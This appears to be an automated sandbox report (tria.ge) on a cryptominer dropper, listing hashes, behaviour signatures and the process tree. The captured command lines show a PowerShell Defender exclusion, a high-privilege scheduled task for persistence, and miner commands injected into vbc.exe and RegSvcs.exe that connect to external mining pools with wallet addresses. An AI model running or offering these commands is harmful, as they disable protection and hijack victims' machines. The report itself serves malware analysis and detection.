Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
99s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
02/01/2023, 19:11
Static task
static1
Behavioral task
behavioral1
Sample
Build-5064047735-69594.exe
Resource
win7-20220812-en
General
-
Target
Build-5064047735-69594.exe
-
Size
793KB
-
MD5
be1c30feca41f897c83974288b591f9a
-
SHA1
82ca8fb9b994f8c99a6156e14057f4e5eab2a025
-
SHA256
b57943849425f3f3a4cc66192d47a1f15900c627f4bad7da4280ad72da553b8c
-
SHA512
4e6b87a008dc822c3671a258c92b9aef511a017137d5a6e7cf5db78d96eaec3e19643b69ee4249958b2fa0c4e2c1d0174dc659feb102cdfb5ad0ee41fc7a6557
-
SSDEEP
24576:hLAt3ieGOGoNOcfLtAz2QFPlePWBoy2Ij:te/VNLFIAPxdY
Malware Config
Signatures
-
Detectes Phoenix Miner Payload 3 IoCs
resource yara_rule behavioral2/memory/3908-163-0x0000000140000000-0x000000014082B000-memory.dmp miner_phoenix behavioral2/memory/3908-164-0x0000000140000000-0x000000014082B000-memory.dmp miner_phoenix behavioral2/memory/3908-165-0x0000000140000000-0x000000014082B000-memory.dmp miner_phoenix -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
pid Process 552 mhnenpgoqiutiptl.exe 212 ghoul.exe -
resource yara_rule behavioral2/memory/3908-158-0x0000000140000000-0x000000014082B000-memory.dmp upx behavioral2/memory/3908-160-0x0000000140000000-0x000000014082B000-memory.dmp upx behavioral2/memory/3908-161-0x0000000140000000-0x000000014082B000-memory.dmp upx behavioral2/memory/3908-163-0x0000000140000000-0x000000014082B000-memory.dmp upx behavioral2/memory/3908-164-0x0000000140000000-0x000000014082B000-memory.dmp upx behavioral2/memory/3908-165-0x0000000140000000-0x000000014082B000-memory.dmp upx -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation mhnenpgoqiutiptl.exe Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation ghoul.exe -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 3908 RegSvcs.exe 3908 RegSvcs.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 212 set thread context of 2580 212 ghoul.exe 96 PID 212 set thread context of 3908 212 ghoul.exe 99 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4908 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 5040 powershell.exe 5040 powershell.exe 212 ghoul.exe 212 ghoul.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 212 ghoul.exe Token: SeDebugPrivilege 5040 powershell.exe -
Suspicious use of WriteProcessMemory 34 IoCs
description pid Process procid_target PID 872 wrote to memory of 552 872 Build-5064047735-69594.exe 80 PID 872 wrote to memory of 552 872 Build-5064047735-69594.exe 80 PID 872 wrote to memory of 552 872 Build-5064047735-69594.exe 80 PID 552 wrote to memory of 212 552 mhnenpgoqiutiptl.exe 83 PID 552 wrote to memory of 212 552 mhnenpgoqiutiptl.exe 83 PID 212 wrote to memory of 5040 212 ghoul.exe 84 PID 212 wrote to memory of 5040 212 ghoul.exe 84 PID 212 wrote to memory of 4920 212 ghoul.exe 90 PID 212 wrote to memory of 4920 212 ghoul.exe 90 PID 4920 wrote to memory of 4908 4920 cmd.exe 92 PID 4920 wrote to memory of 4908 4920 cmd.exe 92 PID 212 wrote to memory of 2580 212 ghoul.exe 96 PID 212 wrote to memory of 2580 212 ghoul.exe 96 PID 212 wrote to memory of 2580 212 ghoul.exe 96 PID 212 wrote to memory of 2580 212 ghoul.exe 96 PID 212 wrote to memory of 2580 212 ghoul.exe 96 PID 212 wrote to memory of 2580 212 ghoul.exe 96 PID 212 wrote to memory of 2580 212 ghoul.exe 96 PID 212 wrote to memory of 2580 212 ghoul.exe 96 PID 212 wrote to memory of 2580 212 ghoul.exe 96 PID 212 wrote to memory of 2580 212 ghoul.exe 96 PID 212 wrote to memory of 2580 212 ghoul.exe 96 PID 212 wrote to memory of 2580 212 ghoul.exe 96 PID 212 wrote to memory of 2580 212 ghoul.exe 96 PID 212 wrote to memory of 2580 212 ghoul.exe 96 PID 2580 wrote to memory of 2332 2580 vbc.exe 97 PID 2580 wrote to memory of 2332 2580 vbc.exe 97 PID 212 wrote to memory of 3908 212 ghoul.exe 99 PID 212 wrote to memory of 3908 212 ghoul.exe 99 PID 212 wrote to memory of 3908 212 ghoul.exe 99 PID 212 wrote to memory of 3908 212 ghoul.exe 99 PID 212 wrote to memory of 3908 212 ghoul.exe 99 PID 212 wrote to memory of 3908 212 ghoul.exe 99 PID 212 wrote to memory of 3908 212 ghoul.exe 99
Processes
-
C:\Users\Admin\AppData\Local\Temp\Build-5064047735-69594.exe"C:\Users\Admin\AppData\Local\Temp\Build-5064047735-69594.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:872 -
C:\Users\Admin\AppData\Local\Temp\mhnenpgoqiutiptl.exe"mhnenpgoqiutiptl.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:552 -
C:\Users\Admin\AppData\Local\Temp\ghoul.exe"C:\Users\Admin\AppData\Local\Temp\ghoul.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:212 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5040
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "PFCIA" /tr "C:\ProgramData\Adobe\PFCIA.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:4920 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "PFCIA" /tr "C:\ProgramData\Adobe\PFCIA.exe"5⤵
- Creates scheduled task(s)
PID:4908
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RN9B8LkT5BcYXbc4ZVMYitfgKaA1wwbXwy.work -p x -t 34⤵
- Suspicious use of WriteProcessMemory
PID:2580 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls5⤵PID:2332
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe -pool ssl://eu1-etc.ethermine.org:5555 -wal 0x20caf9B2c7aB54C3cB949F1489DD697327131861.Rig001 -coin etc -log 04⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3908
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
899KB
MD5813862d29c21094ebd1f95feb80771ff
SHA15e61691a9d791e798e19d99a27c9f9959d319e9b
SHA2565f1c900332c6ce00349719a6eccd13894fc312f2b6460d7f419ca49172c8623a
SHA51297fc207a77d4d11103817998177d656e520b889d7b79c9dd1ab4fd66cf1004a9060f2d6e4acf239a7b8016ffd60949a36e4e78ae26f990768a2952275e5b4580
-
Filesize
899KB
MD5813862d29c21094ebd1f95feb80771ff
SHA15e61691a9d791e798e19d99a27c9f9959d319e9b
SHA2565f1c900332c6ce00349719a6eccd13894fc312f2b6460d7f419ca49172c8623a
SHA51297fc207a77d4d11103817998177d656e520b889d7b79c9dd1ab4fd66cf1004a9060f2d6e4acf239a7b8016ffd60949a36e4e78ae26f990768a2952275e5b4580
-
Filesize
1.5MB
MD54c8d2d06487d07ec350aa5c5d699bb55
SHA1adc4aa68f5aa4b0ea3f9a2ee82100234caea5b2d
SHA2565fe74ecfd6a9eeef45bed3760e4511c300dc843d17120361e5abd021cc107567
SHA51237f5dcf4a4e5f02c5dfb0d4c5cb18d4980efe387572fc3a50fa0d53a23c4403d8c17dbf2df9fa5bb647c0eb1f0a24d4c86e19aa2fb73b447c6cd62c6652b6bab
-
Filesize
1.5MB
MD54c8d2d06487d07ec350aa5c5d699bb55
SHA1adc4aa68f5aa4b0ea3f9a2ee82100234caea5b2d
SHA2565fe74ecfd6a9eeef45bed3760e4511c300dc843d17120361e5abd021cc107567
SHA51237f5dcf4a4e5f02c5dfb0d4c5cb18d4980efe387572fc3a50fa0d53a23c4403d8c17dbf2df9fa5bb647c0eb1f0a24d4c86e19aa2fb73b447c6cd62c6652b6bab